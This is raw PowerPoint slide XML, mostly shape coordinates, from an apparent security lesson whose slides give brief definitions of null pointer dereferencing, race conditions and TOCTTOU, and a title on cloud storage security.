                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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122926" y="439140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122926" y="439140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104638" y="5874257"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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104638" y="5874257"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229361"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361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890009" y="306451"/>
            <a:ext cx="847915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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Null</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dereferencing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5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dirty="0" spc="-6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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Race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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Conditions</a:t>
            </a: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02764" y="760476"/>
            <a:ext cx="11701272" cy="36575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2161158" y="1882292"/>
            <a:ext cx="11930380" cy="2898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83560" marR="5080" indent="-3071495">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Pointers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4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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>C++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refer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memory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locations,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rather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than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value.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null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pointer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created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only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if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memo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loca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ion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ll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va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d.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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2882265" marR="749300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Dereference</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>occurs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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program</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tries</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484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3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write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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address</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pointer.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600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3587750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>loca</a:t>
            </a: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45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484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2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44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484E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85">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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3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0">
                <a:solidFill>
                  <a:srgbClr val="44484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20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="44484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95">
                <a:solidFill>
                  <a:srgbClr val="44484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100">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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th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2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pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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0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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>crash.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30851" y="5785484"/>
            <a:ext cx="9723755" cy="2148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859790" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Race</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>conditions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>directly</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>dependent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484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2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sequence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>timing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484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certain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>events.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250">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="457834">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="44484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90">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>TOCTTOU</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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race</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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2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achieved</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484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0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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>change</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>between </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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the </a:t>
            </a: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time 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the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>validates 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the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>resource </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>and 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the </a:t>
            </a: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time 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the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>resource.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10027" y="4632959"/>
            <a:ext cx="1432560" cy="1431036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13779" y="306451"/>
            <a:ext cx="402844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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Storage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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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8676" y="760476"/>
            <a:ext cx="5399532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301059" y="4946903"/>
            <a:ext cx="5749290" cy="3535679"/>
            <a:chOff x="5301059" y="4946903"/>
            <a:chExt cx="5749290" cy="3535679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5301059" y="5262657"/>
              <a:ext cx="5749290" cy="3220085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5749290" h="3220084">
                  <a:moveTo>
                    <a:pt x="2873676" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2845300" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832401" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832401" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781332" y="1862129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730449" y="1863153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2679753" y="1864859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629243" y="1867249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578921" y="1870321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2528786" y="1874076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2478838" y="1878514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429077" y="1883635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379503" y="1889440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330117" y="1895927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2280918" y="1903098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231907" y="1910953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183083" y="1919491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134447" y="1928712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085998" y="1938617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037738" y="1949206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989665" y="1960479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941781" y="1972435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894084" y="1985076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1846576" y="1998401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1799256" y="2012410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738679" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726156" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711073" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696013" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683561" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675846" y="1126886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673274" y="1144333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675846" y="1159446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683561" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716579" y="2037556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667346" y="2052592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618414" y="2068297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569788" y="2084665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1521475" y="2101693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473481" y="2119376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425811" y="2137710"/>
